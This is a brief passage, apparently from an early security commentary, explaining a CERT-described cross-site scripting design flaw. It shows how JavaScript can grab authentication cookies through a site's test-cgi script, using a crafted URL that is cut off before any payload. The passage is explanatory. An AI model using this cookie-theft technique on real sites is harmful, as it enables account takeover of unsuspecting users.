First, what the CERT describes isn't one of the many implementation bugs we've seen before, like bugs crashing the browser or giving access to local resources: This is a design problem. One obvious abuse could be to compromise online accounts: Many sites use cookies to avoid asking for a username/password on every page of their site. As a result, cookies are often equivalent to passwords. Interestingly, javascript can access cookies on the domain from which the script has been loaded. Say, if your site uses cookies as a mean of authentication and has test-cgi installed, you can get your user's cookies grabbed with a URL like: http://yoursite.com/cgi-bin/test-cgi?a=